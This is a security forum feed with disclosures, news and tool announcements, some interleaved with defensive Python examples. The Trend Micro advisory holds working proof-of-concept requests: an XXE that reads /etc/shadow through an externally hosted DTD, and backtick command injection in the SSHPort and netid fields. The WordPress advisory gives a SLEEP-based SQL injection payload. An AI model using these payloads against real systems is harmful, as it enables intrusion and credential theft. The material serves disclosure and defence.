  13. Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user-defined lists, where a trail can be anything from a domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exe for a known malicious executable), IP address (e.g. 185.130.5.231 for a known attacker) or HTTP User-Agent header value (e.g. sqlmap for the automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in the discovery of unknown threats (e.g. new malware).

      Features
        * Uses multiple public blacklists (alienvault, autoshun, badips, sblam etc.)
        * Has extensive static trails for identification (domain names, URLs, IP addresses or User-Agent values)
        * Optional heuristic mechanisms for detection of unknown threats
        * Based on Traffic -> Sensor <-> Server <-> Client architecture
        * Web reporting interface

      Installation
        sudo apt-get install git python-pcapy
        git clone https://github.com/stamparm/maltrail.git
        cd maltrail
        sudo python sensor.py

      Sources: darknet.org.uk, github.com
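As an added example, not Maltrail's own code, here is trail matching of the kind the post describes, run over constructed proxy log lines. The four trail kinds named in the post (domain, URL, IP, User-Agent) are matched the way a sensor has to match them: a domain trail also covers its subdomains, an IP trail may be a CIDR range, a URL trail is exact, and a User-Agent trail is a substring. The trail entries reuse the examples from the post; the log lines and the 198.51.100.0/24 range are constructed, and the "executable fetched from a bare IP" rule at the end illustrates the heuristic layer and is not one of Maltrail's actual rules.

```python
"""Maltrail-style trail matching over constructed proxy log lines.

Added example, not Maltrail's code. Trail values below are the examples from
the post; the log lines, the 198.51.100.0/24 range and the heuristic rule are
constructed for this demo.
"""
import ipaddress
from urllib.parse import urlsplit

TRAILS = {
    "domain": {"zvpprsensinaix.com": "Banjori malware"},
    "url": {"http://109.162.38.120/harsh02.exe": "known malicious executable"},
    "ip": {"185.130.5.231": "known attacker", "198.51.100.0/24": "constructed scanner range"},
    "ua": {"sqlmap": "automatic SQL injection and database takeover tool"},
}
IP_NETS = [(ipaddress.ip_network(k), v) for k, v in TRAILS["ip"].items()]  # a bare IP becomes a /32
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".bat", ".ps1")

# Constructed lines: timestamp, client, server, method, URL, User-Agent (UA may contain spaces).
SAMPLE_LOG = [
    "2017-06-08T10:00:00Z 10.0.0.12 185.130.5.231 GET http://185.130.5.231/login Mozilla/5.0",
    "2017-06-08T10:00:01Z 10.0.0.13 93.184.216.34 GET http://cdn.zvpprsensinaix.com/a.php Mozilla/5.0",
    "2017-06-08T10:00:02Z 10.0.0.14 109.162.38.120 GET http://109.162.38.120/harsh02.exe Wget/1.19.1",
    "2017-06-08T10:00:03Z 10.0.0.15 203.0.113.5 GET http://shop.example.com/?id=1 sqlmap/1.1.6#stable",
    "2017-06-08T10:00:04Z 10.0.0.16 93.184.216.34 GET http://www.example.com/ Mozilla/5.0",
]


def ip_literal(text):
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None


def match_ip(addr):
    ip = ip_literal(addr)
    if ip is None:
        return None
    for net, info in IP_NETS:
        if ip in net:
            return ("ip", str(net), info)
    return None


def match_domain(host):
    """Exact match or any subdomain of a domain trail."""
    host = host.lower().rstrip(".")
    for trail, info in TRAILS["domain"].items():
        if host == trail or host.endswith("." + trail):
            return ("domain", trail, info)
    return None


def classify(line):
    """Return the list of (kind, trail, info) hits for one log line."""
    _ts, _client, server, _method, url, ua = line.split(None, 5)
    parts = urlsplit(url)
    host = parts.hostname or ""
    hits = []
    for candidate in dict.fromkeys([server, host]):      # de-duplicated, order kept
        hit = match_ip(candidate)
        if hit:
            hits.append(hit)
    hit = match_domain(host)
    if hit:
        hits.append(hit)
    if url in TRAILS["url"]:
        hits.append(("url", url, TRAILS["url"][url]))
    for trail, info in TRAILS["ua"].items():
        if trail in ua.lower():
            hits.append(("ua", trail, info))
    # Heuristic layer (illustrative): executables fetched straight from an IP address.
    if ip_literal(host) and parts.path.lower().endswith(EXECUTABLE_SUFFIXES):
        hits.append(("heuristic", url, "executable downloaded from a bare IP address"))
    return hits


def scan_log(lines):
    """Return (line_index, hits) for every line that matched at least one trail."""
    alerts = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            alerts.append((i, hits))
    return alerts


if __name__ == "__main__":
    for index, hits in scan_log(SAMPLE_LOG):
        print(index, hits)
```

The subdomain rule is the one that matters in practice: DGA and fast-flux domains rotate the left-most label, so a sensor that only compares the full host name misses most of the traffic the trail was published for.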
  14. Want to get paid for a vulnerability similar to this one? Contact us at: ssd@beyondsecurity.com

      Vulnerabilities Summary

      The following advisory describes three (3) vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance version 6.5. The vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance:
        * XML External Entity (XXE) that leads to arbitrary file disclosure
        * Local Privilege Escalation
        * Remote code execution

      Credit

      An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.

      Vendor response

      Trend Micro has released patches to address these vulnerabilities and issued the following advisory: https://success.trendmicro.com/solution/1117412

      Vulnerabilities Details

      XML External Entity (XXE) that leads to arbitrary file disclosure

      Trend Micro Security Manager uses an outdated REST API (resteasy-jaxrs-2.3.5.Final.jar). The library suffers from an XXE vulnerability that can be exploited using Parameter Entities.

      Proof of Concept

      By sending the following POST request, an attacker can obtain the victim's "/etc/shadow":

        POST /rest/authentication/login/sso HTTP/1.1
        Host: 192.168.18.129:4119
        Content-Type: application/xml
        Content-Length: 360

        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE roottag [
        <!ENTITY % start "<![CDATA[">
        <!ENTITY % goodies SYSTEM "file:///etc/shadow">
        <!ENTITY % end "]]>">
        <!ENTITY % dtd SYSTEM "http://192.168.18.130/combine.dtd">
        %dtd;
        ]>
        <dsCredentials>
        <password>P@ssw0rd</password>
        <tenantName></tenantName>
        <userName>&all;</userName>
        </dsCredentials>

      Local Privilege Escalation

      Admin users have access via the web interface to the SSH configuration settings. The port settings are not properly handled and allow injecting shell commands as the root user.

        POST /SSHConfig.jsp HTTP/1.1
        Host: 192.168.254.176:8443
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: https://192.168.254.176:8443/SSHConfig.jsp
        Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 150

        CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&needSSHConfigure=yes&SSHStatus=enable&SSHPort=22&op=save&cbSSHStatus=enable&btSSHPort=221

      In the above request, the SSHPort= parameter does not sanitize the incoming data. An attacker can use this to inject commands that will run as root on the victim's machine.

      Proof of Concept

      The following POST request will call the sleep command with a value of 60 seconds:

        POST /SSHConfig.jsp HTTP/1.1
        Host: 192.168.254.176:8443
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: https://192.168.254.176:8443/SSHConfig.jsp
        Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 150

        CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&needSSHConfigure=yes&SSHStatus=enable&SSHPort=%60sleep%2010%60&op=save&cbSSHStatus=enable&btSSHPort=221

      Remote code execution

      Trend Micro Interscan Web Security Virtual Appliance has a default user with sudo privileges named iscan. This user is locked out but it can access certain elevated functions.

        POST /servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP/1.1
        Host: 192.168.254.176:8443
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: https://192.168.254.176:8443/staticRouteEdit.jsp?action=add
        Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 259

        CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2FstaticRoutes.jsp&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=&oldport=&netid=192.168.1.0&netmask=255.255.255.0&router=192.168.1.1&interface_vlanid_sel=eth1

      In the above POST request, we can see the page has several parameters that are vulnerable and through which we can inject malicious parameters: netid, netmask, router, and interface_vlanid_sel

      Proof of Concept

        POST /servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP/1.1
        Host: 192.168.254.176:8443
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: https://192.168.254.176:8443/staticRouteEdit.jsp?action=add
        Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 259

        CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2FstaticRoutes.jsp&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=&oldport=&netid=192.168.1.0%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20&netmask=255.255.255.0&router=192.168.1.1&interface_vlanid_sel=eth1

      Source
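As an added example, not the appliance's code, here is the server-side input handling that closes the three issues in the advisory above, written in Python even though the affected stack is Java/RESTEasy. `parse_xml_strict()` refuses any request body that carries a DOCTYPE or ENTITY declaration before it reaches a parser, which is what stops the parameter-entity XXE in the login request. `validate_ssh_port()` and `build_route_argv()` type-check the SSHPort and static-route fields and assemble the system command as an argv list, so the backtick and `||` payloads can never reach a shell. The XXE body and the injected route body are taken from the advisory; the `route` argv layout is an assumption for illustration and nothing is executed.

```python
"""Hardened handling of the three request types from the Trend Micro advisory.

Added example, not the appliance's code. The two bodies below are the
advisory's PoCs; the argv layout for the route command is an assumption.
"""
import ipaddress
import re
from urllib.parse import parse_qs, unquote
import xml.etree.ElementTree as ET

XXE_BODY = b'''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/shadow">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.18.130/combine.dtd">
%dtd;
]>
<dsCredentials><password>P@ssw0rd</password><tenantName></tenantName><userName>&all;</userName></dsCredentials>'''

INJECTED_ROUTE_BODY = (
    "CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2FstaticRoutes.jsp"
    "&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=&oldport="
    "&netid=192.168.1.0%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20"
    "&netmask=255.255.255.0&router=192.168.1.1&interface_vlanid_sel=eth1"
)
CLEAN_ROUTE_BODY = "netid=192.168.1.0&netmask=255.255.255.0&router=192.168.1.1&interface_vlanid_sel=eth1"

DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)
IFACE_RE = re.compile(r"^[a-z][a-z0-9]{0,14}(?:\.\d{1,4})?$")   # eth1, eth1.100 (assumed naming)


def parse_xml_strict(body: bytes) -> ET.Element:
    """Reject any DTD outright: a credential document never needs one."""
    if DTD_MARKER.search(body):
        raise ValueError("DTD / entity declarations are not accepted")
    return ET.fromstring(body)


def validate_ssh_port(value: str) -> int:
    """SSHPort must be an integer in 1..65535; anything else is an error, never shell input."""
    if not re.fullmatch(r"\d{1,5}", value) or not 1 <= int(value) <= 65535:
        raise ValueError("invalid port: %r" % value)
    return int(value)


def build_route_argv(form: dict) -> list:
    """Type-check every static-route field, then build an argv list (no shell involved)."""
    netid = str(ipaddress.IPv4Address(form["netid"][0]))          # raises on anything but a dotted quad
    netmask = str(ipaddress.IPv4Address(form["netmask"][0]))
    network = ipaddress.IPv4Network("%s/%s" % (netid, netmask), strict=True)  # host bits set -> ValueError
    router = str(ipaddress.IPv4Address(form["router"][0]))
    iface = form["interface_vlanid_sel"][0]
    if not IFACE_RE.match(iface):
        raise ValueError("invalid interface name: %r" % iface)
    return ["route", "add", "-net", str(network.network_address), "netmask", netmask, "gw", router, "dev", iface]


def route_argv_from_body(body: str) -> list:
    return build_route_argv(parse_qs(body, keep_blank_values=True))


if __name__ == "__main__":
    print(route_argv_from_body(CLEAN_ROUTE_BODY))
    for bad in (unquote("%60sleep%2010%60"), "0", "70000"):
        try:
            validate_ssh_port(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The argv list is the important half: even a validator with a gap cannot turn `netid` into a second command when the value is passed to `subprocess.run([...])` as one argument rather than interpolated into a string handed to `/bin/sh`.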
  15. Security researchers have discovered a massive malware campaign that has already infected more than 250 million computers across the world, including Windows and Mac OS. Dubbed Fireball, the malware is an adware package that takes complete control of the victim's web browsers and turns them into zombies, potentially allowing attackers to spy on the victim's web traffic and steal their data.

Check Point researchers, who discovered this massive malware campaign, linked the operation to Rafotech, a Chinese company which claims to offer digital marketing and game apps to 300 million customers.

While the company is currently using Fireball to generate revenue by injecting advertisements into browsers, the malware could quickly be turned into a massive destroyer and cause a significant cyber security incident worldwide.

Fireball comes bundled with other free software programs that you download from the Internet. Once installed, the malware installs browser plugins to manipulate the victim's web browser configuration, replacing their default search engine and home page with a fake search engine (trotux.com).

The fake search engine simply redirects the victim's queries to either Yahoo.com or Google.com and includes tracking pixels that collect the victim's information.

Far from serving a legitimate purpose, Fireball has the ability to spy on the victim's web traffic, execute any malicious code on the infected computers, install plug-ins, and even perform efficient malware dropping, which creates a massive security hole in targeted systems and networks.

At present, the Fireball adware is hijacking users' web traffic to boost its advertisements and gain revenue, but at the same time the adware has the capability to distribute additional malware.

"Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach," researchers added.

According to researchers, over 250 million computers are infected worldwide, and 20 percent of them are on corporate networks:

25.3 million infections in India (10.1%)
24.1 million in Brazil (9.6%)
16.1 million in Mexico (6.4%)
13.1 million in Indonesia (5.2%)
5.5 million in the US (2.2%)

Warning Signs that Your Computer is Fireball-Infected

If the answer to any of the following questions is "NO," that means your computer is infected with Fireball or a similar adware. Open your web browser and check:

Did you set your homepage?
Are you able to modify your browser's homepage?
Are you familiar with your default search engine, and can you modify it as well?
Do you remember installing all of your browser extensions?

To remove the adware, just uninstall the respective application from your computer (or use an adware cleaner) and then restore/reset your browser configuration to default settings.

The primary way to prevent such infections is to be very careful about what you agree to install. You should always pay attention when installing software, as software installers usually include optional installs. Opt for custom installation and then de-select anything that is unnecessary or unfamiliar.

Via thehackernews.com
      • 2
      • Upvote
  16. Security researchers at Qualys Security have discovered a Linux flaw that could be exploited to gain root privileges and overwrite any file on the filesystem on SELinux-enabled systems.

The high severity flaw, tracked as CVE-2017-1000367, resides in Sudo’s get_process_ttyname() for Linux and is related to the way Sudo parses tty information from the process status file in the proc filesystem.

The Linux flaw could be exploited by a local user with privileges to execute commands via Sudo and could allow attackers to escalate their privileges to root.

Sudo’s get_process_ttyname() function opens “/proc/[pid]/stat” (man proc) and reads the device number of the tty from field 7 (tty_nr). These fields are space-separated, but field 2 (comm, the filename of the command) can itself contain spaces.

Sudoer users on SELinux-enabled systems could escalate their privileges to overwrite any file on the filesystem with their command’s output, including root-owned files.

To exploit the issue, a Sudo user would have to choose a device number that doesn’t exist under “/dev”. If the terminal isn’t present under the /dev/pts directory when Sudo performs a breadth-first search of /dev, the user could allocate a pseudo-terminal between the two searches and create a “symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm.”

The Linux flaw affects all Sudo versions from 1.8.6p7 through 1.8.20; Sudo 1.8.20p1 fixes it. The issue was rated with a CVSS3 Base Score of 7.8.

Via securityaffairs.co
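The parsing detail in the article ("field 2 can contain spaces") is easy to misread, so here is what it means for any program that reads /proc/[pid]/stat, as an added example written in Python rather than sudo's own C code (sudo's actual fix is not shown on the page). A process whose command name contains spaces or a ')' makes a plain whitespace split land on the wrong field, which is exactly how a user ends up controlling the device number sudo reads; anchoring on the last ')' is the robust reading. Both stat lines below are constructed.

```python
"""Reading tty_nr (field 7) from /proc/[pid]/stat when comm (field 2) contains
spaces.  Added example, not sudo's code.  The two stat lines are constructed:
the first is an ordinary process, the second has comm = "a b) c", which defeats
a naive split on spaces but not a parse anchored on the LAST ')'."""

# Constructed: an ordinary process on /dev/pts/0 (tty_nr 34816 = major 136, minor 0).
SAMPLE_STAT_PLAIN = (
    "4242 (bash) S 1 4242 4242 34816 4242 4194304 0 0 0 0 0 0 0 0 20 0 1 0 100 0 0"
)
# Constructed: same layout, but comm is "a b) c" and the tty is /dev/pts/1 (34817).
SAMPLE_STAT_TRICKY = (
    "4243 (a b) c) S 1 4243 4243 34817 4243 4194304 0 0 0 0 0 0 0 0 20 0 1 0 100 0 0"
)


def naive_tty_nr(stat_line):
    """What a plain whitespace split returns as 'field 7'.  Correct only while
    comm has no spaces; on SAMPLE_STAT_TRICKY it returns the pgrp instead."""
    return stat_line.split(" ")[6]


def parse_proc_stat(stat_line):
    """Return (pid, comm, state, tty_nr) from one /proc/[pid]/stat line.

    comm is everything between the first '(' and the last ')'; only the fields
    after that closing parenthesis are genuinely space-separated."""
    start = stat_line.index("(")
    end = stat_line.rindex(")")
    pid = int(stat_line[:start].strip())
    comm = stat_line[start + 1:end]
    fields = stat_line[end + 1:].split()
    # fields[0]=state (3), fields[1]=ppid (4), fields[2]=pgrp (5),
    # fields[3]=session (6), fields[4]=tty_nr (7)
    return pid, comm, fields[0], int(fields[4])


def tty_major_minor(tty_nr):
    """Unpack the kernel's dev_t encoding of tty_nr into (major, minor);
    major 136 is the Unix98 pty slave range, i.e. /dev/pts/<minor>."""
    major = (tty_nr >> 8) & 0xFFF
    minor = (tty_nr & 0xFF) | ((tty_nr >> 12) & 0xFFF00)
    return major, minor


if __name__ == "__main__":
    import os
    if os.path.exists("/proc/self/stat"):
        with open("/proc/self/stat") as f:
            print("self:", parse_proc_stat(f.read().strip()))
    print("robust:", parse_proc_stat(SAMPLE_STAT_TRICKY))
    print("naive field 7:", naive_tty_nr(SAMPLE_STAT_TRICKY))
```

Run on a Linux host the script also parses its own /proc/self/stat; on the constructed tricky line the naive split reports 4243 where the real tty_nr is 34817, which is the whole mechanism the advisory describes.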
  17. MailSecRep adds an Outlook button to analyze email for spoofing, hostile links, and malware attachments. Download: MailSecRep.zip (430.1 KB) Source: https://packetstormsecurity.com/files/142742/MailSecRep-Email-Analysis-Tool-For-Outlook.html
      • 1
      • Upvote
  18. WordPress Huge-IT Video Gallery plugin version 2.0.4 suffers from a remote SQL injection vulnerability.

DefenseCode ThunderScan SAST Advisory
WordPress Huge-IT Video Gallery Plugin Security Vulnerability

Advisory ID: DC-2017-01-009
Advisory Title: WordPress Huge-IT Video Gallery plugin SQL injection vulnerability
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Huge-IT Video Gallery plugin
Language: PHP
Version: 2.0.4 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/24
Risk: High

1. General Overview
===================

During the security audit of the Huge-IT Video Gallery plugin for WordPress CMS, a security vulnerability was discovered using the DefenseCode ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL: http://www.defensecode.com

2. Software Overview
====================

According to the developers, the Gallery Video plugin was created and specifically designed to show video links in unusual splendid gallery types supplemented with many gallery options.

According to wordpress.org, it has more than 40,000 active installs.

Homepage:
https://wordpress.org/plugins/gallery-video/
http://huge-it.com/wordpress-video-gallery/

3. Vulnerability Description
==================================

During the security analysis, ThunderScan discovered an SQL injection vulnerability in the Huge-IT Video Gallery WordPress plugin.

The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Due to the missing nonce token, the vulnerable code is also directly exposed to attack vectors such as Cross-Site Request Forgery (CSRF).

3.1 SQL injection

Vulnerable Function: $wpdb->get_var( $query );
Vulnerable Variable: $_POST['cat_search']
Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
File: gallery-video\includes\admin\class-gallery-video-galleries.php
---------
107 $cat_id = sanitize_text_field( $_POST['cat_search'] );
...
118 $where .= " AND sl_width=" . $cat_id;
...
127 $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "huge_it_videogallery_galleries" . $where;
128 $total = $wpdb->get_var( $query );
---------

4. Solution
===========

Vendor resolved the security issues. All users are strongly advised to update the WordPress Huge-IT Video Gallery plugin to the latest available version.

5. Credits
==========

Discovered with DefenseCode ThunderScan Source Code Security Analyzer by Neven Biruski.

6. Disclosure Timeline
======================

2017/03/31 Vendor contacted
2017/04/06 Vendor responded
2017/05/24 Advisory released to the public

7. About DefenseCode
====================

DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects, delivering precise results and a low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.

Subscribe for a free software trial on our website http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/

Authored by DefenseCode, Neven Biruski

https://packetstormsecurity.com/files/142705/WordPress-Huge-IT-Video-Gallery-2.0.4-SQL-Injection.html
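The root cause in the advisory is worth seeing side by side with its fix: sanitize_text_field() strips HTML tags and control characters, which is the wrong tool for a value that is concatenated into a numeric SQL comparison. The following is an added example in Python with sqlite3 (not the plugin's PHP code) that reproduces the flow of advisory lines 107 to 128 next to a parameterised version; the table name follows the advisory, while the rows, the "WHERE 1=1" prefix and the tautology input are constructed.

```python
"""The advisory's defect in miniature: $_POST['cat_search'] is sanitized as
text and then concatenated into "AND sl_width=" (lines 107 and 118), so the
sanitizer does nothing against SQL.  Added example in Python/sqlite3, not the
plugin's PHP.  Rows, the WHERE-clause prefix and the test input are constructed."""
import re
import sqlite3

TABLE = "wp_huge_it_videogallery_galleries"   # $wpdb->prefix assumed to be "wp_"


def sanitize_text_field(value):
    """Rough stand-in for WordPress sanitize_text_field(): strip tags and
    control characters, trim whitespace.  It is not an SQL escaping function."""
    value = re.sub(r"<[^>]*>", "", value)
    value = "".join(ch for ch in value if ch >= " ")
    return value.strip()


def setup_db():
    """In-memory table with three constructed galleries, two of width 300."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE %s (id INTEGER PRIMARY KEY, sl_width INTEGER)" % TABLE)
    conn.executemany("INSERT INTO %s (id, sl_width) VALUES (?, ?)" % TABLE,
                     [(1, 300), (2, 300), (3, 640)])
    return conn


def count_galleries_vulnerable(conn, cat_search):
    """Mirrors the advisory's flow: sanitize as text, concatenate into SQL."""
    cat_id = sanitize_text_field(cat_search)
    where = " WHERE 1=1"
    where += " AND sl_width=" + cat_id           # attacker-controlled SQL fragment
    query = "SELECT COUNT(*) FROM " + TABLE + where
    return conn.execute(query).fetchone()[0]


def count_galleries_fixed(conn, cat_search):
    """Treat the input as the integer it is meant to be and bind it as a
    parameter (in WordPress: $wpdb->prepare('... AND sl_width = %d', $cat_id))."""
    cat_id = int(cat_search)                     # ValueError for anything else
    query = "SELECT COUNT(*) FROM " + TABLE + " WHERE 1=1 AND sl_width = ?"
    return conn.execute(query, (cat_id,)).fetchone()[0]


def run_demo():
    """Observable difference between the two versions on the same inputs."""
    conn = setup_db()
    tautology = "0 OR 1=1"   # constructed: turns the WHERE clause into "always true"
    result = {
        "vulnerable_normal": count_galleries_vulnerable(conn, "300"),
        "vulnerable_injected": count_galleries_vulnerable(conn, tautology),
        "fixed_normal": count_galleries_fixed(conn, "300"),
    }
    try:
        count_galleries_fixed(conn, tautology)
        result["fixed_rejects_injection"] = False
    except ValueError:
        result["fixed_rejects_injection"] = True
    return result


if __name__ == "__main__":
    print(run_demo())
```

The vulnerable version answers 2 for a real width and 3 (every row) for the tautology, because `AND` binds tighter than `OR` and the sanitizer left the input untouched; the fixed version answers 2 and refuses the tautology outright. The advisory's own payload is the same idea expressed as a time delay (SLEEP) for MySQL. The missing nonce the advisory mentions is a separate fix (check_admin_referer() in WordPress) and is not modelled here.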
  19. What if your laptop is listening to everything that is being said during your phone calls or by other people near your laptop, and even recording video of your surroundings without your knowledge? Sounds really scary, doesn't it? But this scenario is not only possible but is hell easy to accomplish.

A UX design flaw in Google's Chrome browser could allow malicious websites to record audio or video without alerting the user or giving any visual indication that the user is being spied on.

AOL developer Ran Bar-Zik reported the vulnerability to Google on April 10, 2017, but the tech giant declined to consider this vulnerability a valid security issue, which means that there is no official patch on the way.

How Browsers Work With Camera & Microphone

Before jumping into the vulnerability details, you first need to know that web browser based audio-video communication relies on WebRTC (Web Real-Time Communications) – a collection of communications protocols supported by most modern web browsers to enable real-time communication over peer-to-peer connections without the use of plugins.

However, to protect against unauthorised streaming of audio and video without the user's permission, the web browser first requests that users explicitly allow websites to use WebRTC and access the device's camera/microphone. Once granted, the website will have access to your camera and microphone forever, until you manually revoke its WebRTC permissions.

In order to prevent 'authorised' websites from secretly recording your audio or video stream, web browsers indicate to their users when any audio or video is being recorded.

"Activating this API will alert the user that the audio or video from one of the devices is being captured," Bar-Zik wrote in a Medium blog post. "This record indication is the last and the most important line of defense."

In the case of Google Chrome, a red dot icon appears on the tab, alerting users that the audio or video streaming is live.

How Websites Can Secretly Spy On You

The researcher discovered that if any authorised website pops up a headless window using JavaScript code, it can start recording audio and video secretly, without the red dot icon, giving no indication in the browser that the streaming is happening.

This happens because Chrome has not been designed to display a red-dot indication on headless windows, allowing site developers to "exploit small UX manipulation to activate the MediaRecorder API without alerting the users."

Bar-Zik also provided proof-of-concept (PoC) code for anyone to download, along with a demo website that asks the user for permission to use WebRTC, launches a pop-up, and then records 20 seconds of audio without giving any visual indication.

All you need to do is click on two buttons to allow the website to use WebRTC in the browser. The demo records your audio for 20 seconds and then provides you with a download link for the recorded file.

The reported flaw affects Google Chrome, but it may affect other web browsers as well.

It's Not A Flaw, Says Google; So No Quick Patch!

Bar-Zik reported the security issue to Google on April 10, 2017, but the company doesn't consider this a valid security vulnerability. However, it agrees to find ways to "improve the situation" in the future.

Whether Google considers this a security vulnerability or not, the bug is surely a privacy issue, which could be exploited by hackers to potentially launch more sophisticated attacks.

In order to stay on the safer side, simply disable WebRTC, which can be done easily if you don't need it. But if you require the feature, allow only trusted websites to use WebRTC and look for any other windows that they may spawn afterward on top of that.

The Edward Snowden leaks also revealed Optic Nerve – the NSA's project to capture webcam images every 5 minutes from random Yahoo users. In just six months in 2008, 1.8 million users' images were captured and stored on government servers.

Following such privacy concerns, even Facebook CEO Mark Zuckerberg and former FBI director James Comey admitted that they put tape over their laptop cameras just to be on the safer side.

Although putting tape over your webcam would not stop hackers or government spying agencies from recording your voice, at least it would prevent them from watching or capturing your live visual feeds.

Via thehackernews.com
      • 2
      • Upvote
  20. https://www.dd-wrt.com/wiki/index.php/Captive_Portal
  21. evilscan is a Node.js based massive IP Port scanner designed for concurrency, speed and scanning large ranges of IP addresses.

Features

Individual IP or IP range scan
Individual port, ports list, or port range
Banner grabbing (not fully implemented, works with verbose ports only)
IAC negotiation
Reverse dns
Geolocation information
Shell or JSON output
Optional progress details

Usage

Usage: evilscan <fqdn|ipv4|cidr> [options]

Example:

root@debian:~# evilscan 192.168.0.0/24 --port=21-23,80

Options:

--port          port(s) you want to scan, examples:
                --port=80
                --port=21,22
                --port=21,22,23,5900-5902
--reverse       display DNS reverse lookup
--reversevalid  only display results having a valid reverse dns, except if ports specified
--geo           display geoip (free maxmind)
--banner        display banner
--bannerlen     set banner length grabing default 512
--bannerraw     display raw banner (as a JSON Buffer)
--progress      display progress indicator each seconds
--status        ports status wanted in results (example --status=OT)
                T(timeout)
                R(refused)
                O(open, default)
                U(unreachable)
--scan          scan method
                tcpconnect (full connect, default)
                tcpsyn (half opened, not yet implemented)
                udp (not yet implemented)
--concurrency   max number of simultaneous socket opened
                default 500
--timeout       maximum number of milliseconds before closing the connection
                default 2000
--display       display result format (json,xml,console)
                default console
--json          shortcut for --display=json
--xml           shortcut for --display=xml
--console       shortcut for --display=console
--help          display help
--about         display about
--version       display version number

Sample Output

root@debian:~# evilscan 127.0.0.1 --port=0-65535 --banner
127.0.0.1|111||open
127.0.0.1|53||open
127.0.0.1|23|Debian GNU/Linux jessie/sid\r\ndebian login:|open
127.0.0.1|5432||open
127.0.0.1|27017||open
127.0.0.1|28017||open
127.0.0.1|35223||open
127.0.0.1|35491||open
127.0.0.1|39619||open

You can download evilscan here: evilscan-master.zip

Or read more here.

Source
